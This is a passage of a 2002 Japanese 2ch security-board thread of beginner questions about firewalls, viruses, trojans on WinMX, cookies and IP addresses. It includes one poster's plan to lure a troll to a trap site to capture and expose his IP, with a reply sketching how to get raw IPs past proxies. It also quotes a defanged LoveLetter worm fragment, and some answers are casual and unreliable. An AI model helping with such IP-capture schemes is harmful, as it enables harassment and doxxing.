どういう場合ですか?設定如何でとありますがどうすれば防げますか?
PFWがあれば大丈夫?
ローカルプロクシなんだから。 外部に対して 8080 開いたらダメだろ。 LAN 内で Proxomitron を共有するような使い方は危険だって事 それと。 おみとろんじゃ無いが、UA 弄ったりする某ソフト (当然ローカルプロクシとして動作)はデフォで外部におっぴろげで、 普通の串同様 8080 で connect 出来るらしい。ドキュソソフト怖いね。
>>431 あはぁ!漏れと同じ意見の人、セキュ板で初めて見た。
某所で書いたら、滅茶苦茶叩かれて(涙
433 :
名無しさん@お腹いっぱい。 :02/07/03 20:27
Agnitum Outpost Firewallを入れてます。 通信の要求って項目がとんでもない勢いなんですけど、これは 普通ですか?
435 :
こんな事言われたけど大丈夫? :02/07/03 21:06
174 名前:大学への名無しさん :02/07/03 20:49 ID:97JCsbai
おまえの住んでるところただ今調査中。
175 名前:大学への名無しさん :02/07/03 20:51 ID:97JCsbai
にくたらしいいやつ 絶対つきとめてやる!
176 名前:某大学の院生 :02/07/03 20:52 ID:1V1a+EX+
>>174 大阪の何区でしょうっか?
シンキングターイム!
177 名前:大学への名無しさん :02/07/03 20:54 ID:97JCsbai
171
5人がかりで数少ないけど調査中
178 名前:某大学の院生 :02/07/03 20:56 ID:1V1a+EX+
>>177 もし、携帯ならどうなるん?
179 名前:大学への名無しさん :02/07/03 20:58 ID:97JCsbai
おまえあほか?IPアドレスを調査してるんじゃ
437 :
こんな事言われたけど大丈夫? :02/07/03 21:17
唐揚くいて〜。
>>434 安心しました。
ありがとうございます。
440 :
名無しさん@お腹いっぱい。 :02/07/03 21:52
KLEZ.H って言うウィルスに感染したんですが、どうすれば良いんでしょうか? あと、どれくらい悪質なんでしょうか?
>>432 bindするアドレスを指定できないネットワークサーバプログラムは糞。
必要も無いのにINADDR_LOOPBACK以外にbindしてるユーザは糞。
うちのTinyが「UDP Datagram from 172.16.255.254:2051 was blocked by rule 'All Deny'」 だと騒ぐのですが。ポートは1053番が叩かれてます。 しかしこれってプライベートアドレスのBクラスでは・・・? 我が家の家庭内乱じゃ192.168.***.***しか使ってないし。 初めて見るんですがなんなんでしょ・・・
444 :
名無しさん@お腹いっぱい。 :02/07/03 22:50
すみません、ポート1433(SQLサーバー)にやたらと アクセスしようとしてる人が居るんですが、 この人何をしようとしてるんでしょうか? trojan blocked in tcp, 24 48 152 179:3409->localhost:1433, owner no owner (trojanは設定したルールの名前です)
>445 そ、そうなんですか? 実は最近パソコンが急に重くなったんですが・・・ なんかに潜られてるのだろうか。(蒼)
レスありがとうございます。 お礼言うの忘れてた、、、(汗)すみません
>445のリンクへ行けないや・・。 たまにブラウザが異様に重くてサイト見れないときがあるんです。 後で繋げる時にもう一度繋げてみます。ありがとうございました。
450 :
こんなことやってる :02/07/03 23:31
>>444 SQL鯖立ててないんなら問題なかろぅ。
>>450 アプリついでにカモも共有ってことだろ。
そのうち、アカウントとパスも共有されんだろうな。ご愁傷様。
>>450 すごい展開になってるみたい380あたりから。
456 :
名無しさん@お腹いっぱい。 :02/07/04 12:06
age
10分かんのうち95回もTCPPort6346アタックしてきた奴出していい? ホントにうざいんだよ。
458 :
名無しさん@お腹いっぱい。 :02/07/04 14:26
Ad-wareでチェックすると、必ずといっていいほど、cookie doubleclickというクッキが見つかるんですよね。消してもWIN再起動すると また出てきてしまう。 したのがファイル内容で、 test_cookie CheckForPermission doubleclick.net/ この後ろになにやら数字が並んでいます。 これはいったい何なんでしょうか?
ノートンインターネットセキュリティ2002を買おうと 思うのですが通常版とプロフェッショナル版があるみたい なのですが、どちらを買えばよいでしょうか?性能のいい 方買いたいのですがどちらの方がいいですか
460 :
名無しさん@お腹いっぱい。 :02/07/04 14:47
208.2.157.34逝ってよし!
463 :
名無しさん@お腹いっぱい。 :02/07/04 15:04
>>460 &462
ありがとうございます。
フリOpera使ってる自分はあまり文句言えなさそうですね。
>>460 多少プロフェッショナル版の方に強力そうな機能がありますが
無くてもいいような物なのでしょうか?
>>463 Operaなら設定のプライバシーのところでクッキーを受け入れるかどうか設定できる
から、必要なサイトのみ受け入れるようにすればダブルクリックのクッキーは作成
されない。サードパーティのクッキーは当然拒否。
>>464 個人用途ではノーマルのNISで十分と思う。
>>466 横レスだけど。 NISのIDS評価してたらレポートプリーズ。
468 :
名無しさん@お腹いっぱい。 :02/07/04 15:51
さっき 【データ流出】企業の顧客データもろみえ その5 のスレで紹介されてたURLにアクセスしたら データが見れたんだけど、後で追求されたりしませんよね…? 学校からアクセスしたんだけど。 これって私が不正アクセスしたことになるの?
469 :
名無しさん@お腹いっぱい。 :02/07/04 16:14
>>468 Web上で公開されているものにアクセスしても不正アクセスにはなりません。
ただ、そのサイトが事件に関係して犯罪捜査があったときに警察から問い
合わせがあったりするかもしれません。その場合でも逮捕されたりするこ
とはないので安心して。
今起きた事なんですが、、 2ch見てたりしてただけなのに妙にHDDにアクセスしてる気配があったんですよ。 でね、アクセスされてるファイルを見つけたんですがフォルダのプロパティ見たら 「このフォルダを共有する」ってなってたんですよ。アホかと。 「共有しない」にチェックしたら止みましたけど、これって漏れが悪いんですか?
473 :
名無しさん@お腹いっぱい。 :02/07/04 17:53
>>472 そうです。
ところで接続はCATVそれともYBB? MXはやってますか?
パーソナルファイヤーウォール入れてますか?
>>473 回線‥‥CATV。MX‥‥やってます。
パーソナルファイヤーウォール‥‥入れてません。
なんで知ってるんですか?アフォにこういう奴が多いから?
すいません、誰か助けてください! outlook expressのログオンのパスワードを忘れてしまいました! もう見ることは出来ないのでしょうか? 宜しくお願いします。
>>474 あんたも無知だな。アフォ丸出し
YBBやCATVはほかのユーザーからもアクセスできる
>>476 はあ、環境じゃなくて人間がアフォでしたか
勉強になりました
>>475 マルチだったのかよ。初級ネットで答えてくれた人いたぞ。
480 :
名無しさん@お腹いっぱい。 :02/07/04 18:36
>>475 PC初心者でも質問してんじゃねーかボケ
と突っ込んでおくテスト
482 :
名無しさん@お腹いっぱい。 :02/07/04 18:53
2chの同じ板で同時刻でIDが同じってあるんでしょうか? また、IDを意図的に変える(詐称する)事って出来るんでしょうか? どなたか教えてくださいマセ。
>>482 前段:ある。後段:変えることは出来るが、詐称は出来ない。
ホントにくだらない質問だな。IDがどうやって振られているか調べれば
分かることだろ。
>>482 あと何かあったら初心者の質問板の方へ。
486 :
名無しさん@お腹いっぱい。 :02/07/04 18:59
>>483 同時刻で漏れと同じIDの書き込みがあったからびっくりしてさ・・・
ということは偶然だったんですかねぇ?
IDってIPと日付から関連付けされてるんですよね。
ほんとに詐称はできないの?
ああ、板違いでしたか・・スマソ
>IDってIPと日付から関連付けされてるんですよね。 てのがわかってて >ほんとに詐称はできないの? 何でこんな事聞くんだろう・・・
489 :
名無しさん@お腹いっぱい。 :02/07/04 19:27
質問させてもらいます。
新しいMXの楽しみ方
http://tmp.2ch.net/test/read.cgi/download/1024930771/ の203氏がトロイでこんな事できるんだぜへっへーんといってトロイのクライアントソフトと
トロイに感染している人のIPを晒しまくっています。実際やってみたらその通り、丸見えでした。
本当にこんなことができるんだなと新たな発見ともしかして自分も、、、という恐怖を感じました。
ここから質問ですが、このトロイに感染している人たちはなぜ気づかないんでしょうか?
それとも気づいていながら知らん振りしているのでしょうか?非常に恐ろしいです。
本当に気づいていないとしてもなんかPCの調子がおかしいなと思いそうですが…
セキュリティ板の方たちのこのスレの感想と意見が聞きたいです。
くだらない質問ですがヨロシコおながいします
>>489 MXってどういうことやってんのか分かってんのか?
分かっていないならP2Pとかでちょっと検索でもやってみそ。
(´-`).。oO(変なソース貼るからダウソ板から流入するじゃねえか・・・)
阿呆だから。としか言いようが無い。 大体トロイ入りのexe開くような阿呆が トロイって言葉しってるとも思わないし、 トロイ入ってるexe踏めちゃうって事は アンチヴィールス持ってない(or 使ってない)わけだから 気付かないだろうね。ま、トロイ経由でメッセージ送ったりすれば さすがに何か気付いてアンチヴィールス買って来るかもねぇ。
>>489 > ここから質問ですが、このトロイに感染している人たちはなぜ気づかないんでしょうか?
厨房だから。
> それとも気づいていながら知らん振りしているのでしょうか?非常に恐ろしいです。
可能性は0ではないが、本当に気づいてないのだろう。
> 本当に気づいていないとしてもなんかPCの調子がおかしいなと思いそうですが…
少し重いなとか、ネットワークのアクセスがいつもより頻繁だとか、ディスクアクセスが怪しいとか
注意深ければ気づくかもしれない。
つか、MXやってる連中って 貰ったexeウィルスのチェックもしないで実行するのか??
495 :
名無しさん@お腹いっぱい。 :02/07/04 19:43
>>490 MXはもう卒業しましたが、P2Pとはいったいどういうものかは漠然と分かっているつもりです。
専門的には分かりませんが。
>>491 ダウソ板にはこちらのソースは書き込んでいませんです。
>>492 >>493 やっぱ、阿呆なんですか…のほほんとMXやっててHDD覗かれているなんて夢にも思って
いなんでしょうかね(^^;アセアセ
しかし、このトロイっていうのはよくできたソフトですね。踏み台にされるって言うのも納得できます。
この晒されている人たちがある日突然不正アクセスでタイーホなんてこともありかねないってことですか…
>>495 ダウソ板でウィルスソースを貼り付けたヤシがいるので、アンチウィルス
ソフトが反応して騒ぎになり、多数がセキュ板に来たことを指していると思われ。
497 :
名無しさん@お腹いっぱい。 :02/07/04 19:48
>>496 あっ、そういえば今ダウソで騒ぎになっていますね。いったい何なんでしょうか?
498 :
名無しさん@お腹いっぱい。 :02/07/04 19:50
ダウソ板の奴がvbsのソースコピペして そのソースにノートンとかが反応して そのノートン使いの一部の阿呆が、ウィルスに感染した〜 とか騒いでるだけ。
ちなみにこのトロイに引っかている人たちのIPはどうやって調べているんだろうか?
トロイのサービスポートで適当にポートスキャンすればいいじゃん
自分で付けてMXでばら撒いてる アドレス知るなんざた易いこと
感染先から連絡があるんだから、調べるまでもないよ。
>>504 それだと自分の身元が、逆に一発でバレませぬか?
506 :
名無しさん@お腹いっぱい。 :02/07/04 20:35
フレッツADSL(1.5M) WIN98(SEではない) zone alarm v2.6.362を入れたのですが 平均スループットが 1200kbps台から600kbps代後半にまでおちこみますた (ゾヌ使用中も使用していないときも) アンインストールして大抵のdllも削除し (vspubapi.dll vsutil.dll vsmonapi.dll vsdata.dll vsdatant.sys等) MTUなども弄り直したのですが 速度がまったく元に戻りません どのように対処したらいいでしょう?
MXやってないのにPCが急に重いです・・・どうして・・。
トロイしかけられた方が ネットに接続した瞬間にメールかICQでIPアドレス知らせる機能が あるんだけど、トロイかかるような阿呆がそこ押さえられるかどうか 知らないけど、最高で捨てメアドかICQの連絡先?(ICQ使った事無い) くらいは分かるかもね。
>>506 ZoneAlarmをスタートアップからは外して、再起動してもそうっすか?
ADSLモデムの電源をプッチーンって切断してもう一度やってみるっつうのも、どうでしょか。
>>507 このタイミングでその質問はまずかった… ネタとしか思えん。
>510タイミング悪くてすみません。 ネタじゃないです。というか数日前からなんで。 正確には軽くなったり重くなったりしますが、 基本的にはずっと重いです。 最初の頃はどうしても固まってたんですが最近それはないです。
>>511 こびとさんがうしろでひっぱってるからです
CPU時間食ってるプロセスを調べなさい
513 :
名無しさん@お腹いっぱい。 :02/07/04 20:59
>>509 電源プッチン半信半疑でやってみたらマジで効きました
1.28Mbpsまで完全に元通りになりました
ども有り難うございますた
>>514 さっきここに書き込む前に
コントロールパネル→ネットワーク→LANカードのTCP/IPのプロパティーを表示→
IP アドレスタブをクリック。
「IP アドレスを指定」にチェック
IP アドレスの値は「192.168.0.5」等
サブネット マスクの値は「255.255.255.0」等
ってやってみたんですが
それでは解決しませんでスタ
まあともあれ
解決してヨカタです
>>515 それは重い/軽いには全然関係ないですな。
あと、ADSLモデムの電源は時々落としたほうがいいですよ。
入れっぱなしだと、速度が落ちる一方ですから。
まぁとにかく解決してよかった。考えてみたら板違いもいいとこだけど。
>>517 ゾヌアラームだったからここに書いたけど
確かに板違いかも知れない
スマンカッタ
>>516 プチ勉強になりました、多謝。
フォールバックって単語をメモしときました。
>512 どうやって調べればよいのでしょうか・・・。
>>520 タスクマネージャの「プロセス」タブの所で見る。
「CPU」の欄の数字がCPU使用率で、特にCPUを使うものがない時は
「System Idle Process」が95%とかになってる。
タスクマネージャは、XPだとCtrl+Alt+Deleteで起動する。他は知らん。
523 :
名無しさん@お腹いっぱい。 :02/07/05 01:46
リモートホストから、相手のAPのある地域を調べることってできませんかね? プロバイダーとかはすぐわかるのですが、APまではどうやって調べればいいのか。 別に悪いことに使うわけではないですので。
524 :
困ったチャン :02/07/05 02:15
何か不正プログラムが入ってきて削除できません。 フォルダ名はxeroxです。まあエロサイトでやられたわけですが。 削除しても誰か使ってるか、プログラムで使用しているってことなんです・・ よろしくお願いします
526 :
困ったチャン :02/07/05 02:30
あら・・・。変なプログラムじゃなかったんですね。お騒がせしました。 525さん、ありがとうございました。
527 :
名無しさん@お腹いっぱい。 :02/07/05 02:47
>>450 の件が、なんだかおもしろい展開になっとる。
528 :
名無しさん@お腹いっぱい。 :02/07/05 04:26
529 :
名無しさん@お腹いっぱい。 :02/07/05 09:19
すみません、お聞きします。 企業のドメインからIPアドレスがドメインサーチなどで 検索されますが、そのIPを直接アドレスバーに打ち込んで サイトを見るのはいけない事なんでしょうか? またIPを打ち込んで見にきたと管理者側に分かるものなんでしょうか? ドメインサーチで簡単にIPアドレスって解ってしまいますが 普通そんな簡単に解ってしまっても構わないものなんでしょうか? 今度自社サイトを作るつもりなんですが よく「IP抜いた」とかハッカーやクラッカーなどは IPを調べてから攻撃する、などと聞いてなんだか心配です。 ほんとに下らない質問ですがどなたか宜しくお願いします。
>529 IP直打ちの方が微妙にアクセス速度が速くなる。(DNSを通さないから) それ自体には問題がないが、何らかの理由でIPが変更された時に困る。 IPアドレスについては>7読め。
IPアドレスってのが「住所」ってのはわかるよな? 銀行強盗なんかは銀行の住所がわからないと強盗に入れない。(場所を知っているというのも同義で) ハッカーやクラッカーも同じ。 住所がわからないと何もできない。 だから調べる。 しかし、住所は一般に公開されてるものだ。 住所がわからないと郵便物も届かない。 住所は常に公開されている。 住所がわかる事自体には何の問題もない。
532 :
名無しさん@お腹いっぱい。 :02/07/05 09:40
>>450 のスレを見て質問
OSはMeです
もしNAVでも検出できないようなトロイに引っ掛かったら
msconfig→スタートアップの欄にも***.exeは表示
されないのでしょうか?
>>527 ダウソ板ってほんとにひどいな。蜜壷作成決定。
…と思ったけどVMWareで十分か
VBS,Internal ↑今日は特に怪しいURL踏んでないのに 今、ノートンで検出されたウィルスです。 踏んでから検出されるまでって結構時間かかりますか?
>>535 ってことは、ついさっき踏んだってことですよね?
tp://poteto.itits.co.jp/b.asp?S=dirbaku&VNO=79
tp://live.2ch.net/test/read.cgi/weekly/1021347631/
参考までに貼ってみます。上記2つのURLしか踏んでなかったはずなのに・・。
(しかも下の方は2ch内ですよね?)
あとはKB数の低い知人からのgooアドを開いたり
hotmailのDMを削除しただけです。
どこでこういう質問したら一番よいでしょうか。
579 名前:超超既出 投稿日:02/07/05 00:58
560 名前:ダウソのウイルス原因 投稿日:02/07/04 18:45
えーと、どうやら色々と調べた結果
ここのスレの197(・・・かな?)の書き込みを表示すると
ウイルス感染するみたいです
ttp://tmp.2ch.net/test/read.cgi/download/1025717301/-100 "VBS.Internal"←とか言うウイルスでした
562 名前:名無しさん@お腹いっぱい。 投稿日:02/07/04 19:17
書き込みを表示するとウィルスに感染するって、んなアホな。
と思って見にいったら、VBSのソースじゃねーか・・・。
そりゃ警告出すだろうが・・・
ダウソ板ってある程度危険なことしてるんだろうから
もう少し基礎知識あってもいいと思うんだが・・(そのスレの197前後見るとねえ)
とりあえず、気にしなくて良いよ、とだけ。
520 名前:名無しさん@お腹いっぱい。 投稿日:02/07/04 21:15
http://tmp.2ch.net/test/read.cgi/download/1025717301/191-201] ニュー速で見つけました。2ちゃんのスレなんだけど、踏むと感染するって言われました
踏んでしまった。・゚・(ノД`)・゚・。
521 名前:名無しさん@お腹いっぱい。 投稿日:02/07/04 21:19
>>520 しません
どこぞのキチガイが、197のvbsのソースにセキュリティソフトが反応したのを
ウィルスに感染したーとかほざいてるだけだから。
つかみりゃわかるっしょ。んな情報に踊らされるのは
ノートンに踊らされて騒いでるキチガイと同レベルだぞ。
529 名前:名無しさん@お腹いっぱい。 投稿日:02/07/04 21:40
VBS.Internalというのに感染しているみたいですけど、
どんなウィルスですかおせーてくらさい。
おながいします
530 名前:名無しさん@お腹いっぱい。 投稿日:02/07/04 21:42
UZEEEEEEEEEEEEEEEEEE
またダウソ板からかよ
ウィルスにかかってねーからもうくんな。
みなさん、お騒がせしました。他所の板で貼ってあった為 いち早く皆に知らせようと焦った次第でしたので なにとぞ厨房ぶりをお許し下さい。有難うございました。
ノートンがデフォでhtmlまでウィルス検査すんのって、何か意味あんのかなぁ・・
ウワァァァン!
>>541 表示されたらラッキー、表示されなかったらアンラッキー
Nimdaって今までどれくらいのマシンが感染したんですか?
地球の総人口の2倍くらい
>>543 そりゃもうビックリするほど沢山。今でも飼っているヤツ
テンコ盛り。
546 :
名無しさん@お腹いっぱい。 :02/07/05 11:41
547 :
名無しさん@お腹いっぱい。 :02/07/05 12:25
教えてください! 友人の話なんですが、Nimda&Klezに感染して、OSを新規インスト し直したんですが、たまに勝手にPCが立ち上がってるときがあるらいしんです。 これってどういうことなんでしょうか?
>>548 マザーボードの設定によるものでは?
LAN経由とかモデムで起動できるような設定にしてない?
設定はマザーボードごとに異なるから、
マニュアルをよく読むべし。
ちょっと気になったんだけど... TAによっては、サポートなんかに電話すると遠隔?でTAの設定確認とかしてく れちゃうメーカーとかあるじゃん。 あれって、一般回線で外部からモデムなんかでTAにダイヤルアップして接続 してATコマンドを送って確認してるのか??? してるわけなんか
してるわけなんか
552 :
名無しさん@お腹いっぱい。 :02/07/05 13:18
気に食わない奴のIPを偽サイトを作って晒そうと思っているのですが Visitor Checker 3ってアクセス解析ソフトはIE6でも作動するのですか? 自分のサイトで試してみたんですけど、どーもまともに動かなくて....
TAでそんなのがあるんですか。 確かに友人の家はISDNなんで、TA使用してるんですけど・・・ マザーの設定しらべてみます。 ハード的な故障でそういう現象になることってありえるんでしょうかね?
気に食わない奴のpppなipアドレス晒して馬鹿にされるのは貴方だと思いますが
556 :
名無しさん@お腹いっぱい。 :02/07/05 13:30
実際、ネットにも接続しながらサポートにもTELしてた訳よ。 そしたら、確認しますのでって契約番号聞かれて..しばらくすると、 すいません繋がらないのですがといわれたんで、ネット接続を切っ たら具体的に設定間違ってるよといわれたのよ。 別にTAにダイヤルアップしてる感じもなく無音なんだ。 なんか怖い... ルータもこの頃は電話帖で番号登録できるやつとかあるけど ローカルならパスなしで見られちゃうんじゃないの??
ありがとうございましたm(_)m またいろいろ試してみます。たぶんマザーの設定の方ぽいですね。 助かりました!!
558 :
名無しさん@お腹いっぱい。 :02/07/05 13:32
>>555 >気に食わない奴のpppなipアドレス晒して馬鹿にされるのは貴方だと思いますが
なんでですのん?
IP晒されたら結構ビビりません?
560 :
名無しさん@お腹いっぱい。 :02/07/05 13:34
気に食わない奴ってのは荒らしでちょっとでもビビらせれば 荒らし止むかなーと思いまして
562 :
名無しさん@お腹いっぱい。 :02/07/05 13:36
あ、どーもお手数かけました
>>558 どーかなー?びびる人は限られてると思うよ。
>>558 相手が君と同じレベルの「IP厨」なら、たしかにビビるかもな。
荒らされるのは、開設者の対応にも問題あることが多い。 オマエの言動見てると荒らされそうな感じだよ(w
荒らしならそのプロバにメールすりゃいいだろ >IP晒されたら結構ビビりません? 全然。 まあ超が付くほどの初心者ならビビるかもしれないが 確実に厨房扱いされるのでお勧めできない。(無意味だし)
567 :
名無しさん@お腹いっぱい。 :02/07/05 13:39
>561 その荒らしめちゃ厨房なんすよ 特定のコテハンに粘着してレス全部読んで 個人情報を集めてコピペしまくってるんです 前にも数回IP抜かれてそこのプロバに直接文句を言ったら しばらくおとなしくなったんです。 前はものすごく単純な方法でIP抜けてたんですけど 最近厨房なりに学習してきちゃって(笑 串の使い方もわからない奴だったんですけどね
568 :
名無しさん@お腹いっぱい。 :02/07/05 13:40
へ? 2chでどうやってアクセスログ取るつもりなんだ?
>>567 プロキシ規制した方が早いと思うよ。
そんでも荒らされたら、そいつのプロバイダにログを提出して警告してもらう。
そのほうが余程有意義だと思う。
571 :
名無しさん@お腹いっぱい。 :02/07/05 13:42
昔一回ソース見ればIP出る掲示板に誘導したら 見事に引っかかってくれました
あ、2ch内の話だったンスね。
573 :
名無しさん@お腹いっぱい。 :02/07/05 13:44
>>569 コテハンに粘着してるので、そのコテハンの情報が載ってるサイト
って嘘を付いてIP抜きのトラップのUrlを貼ろうと思ってるんですけど
>>573 2chがログ開示しないのに
どうやってひっかかったヤシのIPと粘着のIPを照合するつもりで?
誘導には100%引っかかるキティなんで トラップのサイトで訪問者のIPを抜ければ(串も貫通させて) 成功するんですが.... でもちゃんとしたアクセスログの解析って有料ばっかりなんですよね.....
>>574 以前にも数回IP抜いたことあるのでその荒らしが住んでいる
地域は特定されてます
>>578 荒らしは2ちゃん運営サイドに任せろ。
「荒らし」っていうけど実はアンタがそいつに叩かれてるだけなんじゃないのか?
本当に荒らしなら板住人で協力して対処すべし。
>>557 削除人がほとんどこない隔離板なので
削除依頼がまったく追いついていないんです
って2chの管理体制の愚痴をここで言ってもしょうがないですね
今回の件はそのキティに粘着されてるコテハン達が協力して
進めてる自衛策なんです
放置でいいじゃん 下手にかまうから、調子に乗るんだよ
串も貫通させてとかアクセスログ有料とかわけわからん事ばっか言ってるけど telnetとかsmtpとか別ポートで接続させて 生IP抜くcgi程度は書けてそんな事いってんだろな? できるならこんなとこで聞かんでさっさとやってみればいいだろう。 何を聞きたいのかようわからんが。
>>581 削除人が来ないのは隔離板だからではなく、依頼方法に問題があったり
する問題板だからだ。
これを機会に2chを引退したらどうか?
(´-`).。oO(なんかその板レベル低そうだな・・・)
>>579 じゃーまずそのキティの荒らし方について
僕が居る板はコテハン煽りが激しいのでみんな地下に潜って
雑談しているんです。そこなら煽られる心配もあんまりないし、
雑談で他の人に迷惑係りませんよね?
でもその荒らしはその地下スレを全部チェックしていて、
個人的な情報をコテハン別に集約して、たまると一気に
コテハン煽りスレッドえを立てて、上げ続けるんです。
たとえば、どこに住んでるとか、仕事は何かとか、趣味は...
と言った具合です。
そしていろんなサーチエンジン使ってそれに該当するような
名前を集めてきて、そこら中にコピペして来るんです
実際実名を張られてたコテハンもいます(否定をしなかったので幸いばれませんでしたが)
588 :
名無しさん@お腹いっぱい。 :02/07/05 13:57
まー僕はもともとネットのセキュリティ詳しくなかったので 今はそのために勉強始めたばっかりなので ここでは質問する資格すらありませんね
590 :
名無しさん@お腹いっぱい。 :02/07/05 13:59
コテハンスレッドは削除対象だろ。 サーチエンジンに引っかかるのは公開している情報だからだろ。 2ちゃんのコテハンと自分のサイト等でのハンドルが同じだったり 個人情報につながるカキコを2ちゃんでやるからそうなるんだろ。 コテハン使ってもカキコをうまく吟味すれば個人が特定されることはない。
>>587 あなた方は、自ら地下スレに個人的な情報を書き込んでいるんですか?
んだからさぁ 2chの運営側がIP開示しなかったらさあ IP抜きするにしたって それが証拠になんねーわけよ そのIP晒してビイる程度のド厨房ならそれでいいけどさあ それプロバに提示したって対処取ってもらえないんだから アク禁要望スレにでも状況書き込んで 運営側がなんとかするの待つしかねーだろうと。 リモホから地域は割れてるって その都道府県には何万人くらい住んでると思ってんのよ
>>591 自分で住所とか電話番号書いたりはしてません
仕事内容とか、研究内容だとかで個人特定が容易な板なもので...
具体的な名前を出さなくても消去方でどんどん特定できる範囲が
狭まって行くんです
雑談止めろ、といわれればそれまでですけど
コテハン止(もしくは2ch)やめるしかなんですかねぇ?
>>590 スレッド名に堂々とコテハン煽りの文句があっても削除されません
削除申請しても、です
昔はこまめに削除していただいてましたが、
最近はどうも削除人が居ないんじゃないかと思うぐらいです...
>仕事内容とか、研究内容だとかで個人特定が容易な板なもので...
>具体的な名前を出さなくても消去方でどんどん特定できる範囲が
>狭まって行くんです
>>591 はまさにそれをやるから問題だと言ってるのが読めないか?
>>592 ある特殊な事情で数百人の中の一人だと言うことは
判明しています
>>597 それをやって何も気にせずに好き放題しゃべっていたら
Googleの検索に引っかかって、痛い思いをしました。
2chでのコテハンをその個人サイトでも使ってたのが馬鹿でした。
>ある特殊な事情 そういう内輪の問題がからむのなら、あなた方の属する閉鎖社会内で解決 してください。
どういう事情だよ
女の子の事情
真昼の情事
もうこの板のスレの趣旨とはまったく離れて来ましたね それでは削除依頼か批判要望に逝ってきます 質問に答えてくださった方々ありがとうごさいました
彼女と私の事情〜♪
>>605 いままでそういう対処の仕方をしていたなら削除人も相手にしなく
なるだろうし、批判要望板でもあしらわれるだろうね。
団地妻のアブナイ事情 燃える四畳半
厨房板は存在する…
ダウソの例のスレで警察から電話があったという書き込みが........ これはトロイの被害にあった人がプロバイダに相談→侵入者の IP割り出し→通報→警察から電話ということなんでしょうか? 電話があること事態なんかぁゃυぃのですが、実際はどうなんでしょうか?
ネタだから厨房は相手にしないでよし
トロイ使って何かしらした奴も十分厨房だと思うけど どう間違っても不正悪禁法にかかるし
613 :
名無しさん@お腹いっぱい。 :02/07/05 17:25
☆ チン マチクタビレタ〜 マチクタビレタ〜 ☆ チン 〃 Λ_Λ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヽ ___\(\・∀・) < トロイ厨のタイフォー祭りまだ〜? \_/⊂ ⊂_ ) \_____________ / ̄ ̄ ̄ ̄ ̄ ̄ /| | ̄ ̄ ̄ ̄ ̄ ̄ ̄| | | .佐賀みかん. |/
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs”) ↑ わざと全角で書いてあります。 2chもふくめ、これが半角でかかれていると、ウイルスチェッカーでひっかかる なんですか これ
はぁ・・・
(;´Д`)ハァハァ
>>615 なに使ってだよ!
そんなの欠陥品じゃん。
( ゚Д゚)ハァ?
使ってる人の頭が欠陥品
621 :
ひみつの検疫さん :2024/12/27(金) 06:08:33 ID:MarkedRes
汚染を除去しました。
∧__∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ゚ρ゚ )< あうあうあー (つ つ \_______ | っ| (__)__)
|_∧ |ー゚) キョウハ、イジメルヒト・・・イナイ・・・・ |⊂ オドルナライマノウチ |
♪ ♪ ♪ ∩ ∧_∧ ハニャ、ニャン ヽ (*゚ー゚) ハニャ、ニャン ヽ ⊂ ヽ ハニャ、ニャン O-、 )〜 ニャン U
♪ ♪ ♪ ∧_∧ ハニャ、ハニャ (*゚ワ゚)⊃ ハニャ、ニャン ヽ⊂ 丿 ハニャハニャ ⊂ _ / ニャン、シィー!! し
Λ_Λ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ハァハァ (* ´Д`)<オナーニの途中だから邪魔しないでくれる? _ (||||__⊂)__ \_______________ /旦/三/ /| ((| ̄ ̄ ̄ ̄ ̄| | ))カタカタ |愛媛みかん|/
| すみません | となりでワッショイしてもよろしいですか? \___ ____________ ∨ __∧_∧__/■\____ | ( ;´∀`) (´∀` ) .| | ( ) ⊂ ) | / ̄( ( (  ̄( ( (  ̄ ̄/| || ̄ (_(_) ̄(_(_) ̄ ̄|| ∧ / ̄ ̄  ̄ ̄ ̄ ̄\ | (エッ!!) | | ど、どうぞ・・・・ |
おにぎりワッショイ!! \\ おにぎりワッショイ!! // \\ おにぎりワッショイ!!/ + + + /■\ + __∧_∧__ (´∀`∩)__ + | (´∀`; ) (つ 丿 )) | | ( )(( ( ヽノ .| / ̄( ( (  ̄ ̄し(_) ̄ ̄/| || ̄ (_(_)  ̄ ̄ ̄ ̄ ̄ ̄ || ∧ / ̄ ̄  ̄ ̄\ | ・・・・・・・・・ |
―――――――――――――― мафия!мафия! __ __ .r―――――――― ∨ |антисемитизм, антифашист ский! 日 凸 U | ______ ≡≡≡.≡≡| /〃∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ U ∩ [] ∨%<`Д´|||;> <・・・・・・・・・・???? __[|""|]__.[|"""|,]_ )_ \______ 日< """,> < """ †>□ ― / | ― ( ┃)――― \(__.ノ ━┳━) ━┳━ └ ┃―・゛
ビクッ. ∧ ∧ ∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ Σ(゚Д゚;≡;゚д゚) < うお!なんかすごいところに迷い込んじまったぞゴルァ! ./ つ つ \______________________ 〜(_⌒ヽ ドキドキ )ノ `Jззз
お騒がせしました。
回しか。
回さないと新しく来た人がまたウィルスだと騒ぐ。
635 :
名無しさん@お腹いっぱい。 :02/07/05 21:19
ID/PWを入力してログインしたサイトでリロードすると 「情報を再送信しないとページを表示できません」 という、情報の再送を促すダイアログ出ますよね。 これを出さずに自動的に再送する方法なんてありますか?
>>635 ありません。セキュリティの意味が無くなってしまいますから。
638 :
名無しさん@お腹いっぱい。 :02/07/05 22:04
昨日2chのトップを開いて、接続したまま放置してあったのですが、 突然「ウィンドウは、表示中のWebページによって 閉じられようとしています。このウィンドウを閉じますか?」 なるメッセージが出てブラウザを閉じさせられました。 で、心配だったのでトロイをオンラインスキャンしたのですが、以上無しでした。 しかし、先ほど接続した直後にまた同じメッセージが表示されてしまいました。 ADSLを使ってます。 これはどうしてでしょうか?教えてください
639 :
名無しさん@お腹いっぱい。 :02/07/05 22:06
ノートンがこのスレのログでVBS LOVELETTER Aを検出したみたいなんだけど・・ どうしてだろう。どこかに仕込んであるの?
教えてくれてありがとう〜。やっぱいたずらだったのか。 ウイルス情報見てもなんか違うし、変だなと思ってたのよ。
643 :
名無しさん@お腹いっぱい。 :02/07/05 22:50
教えて下さい。 今突然、ウイルスに感染しました という表示がされて、とりあえずOKで閉じたんですけど スキャンしたら感染1 と出ました。 あの、私は何をしたらいいのでしょうか?
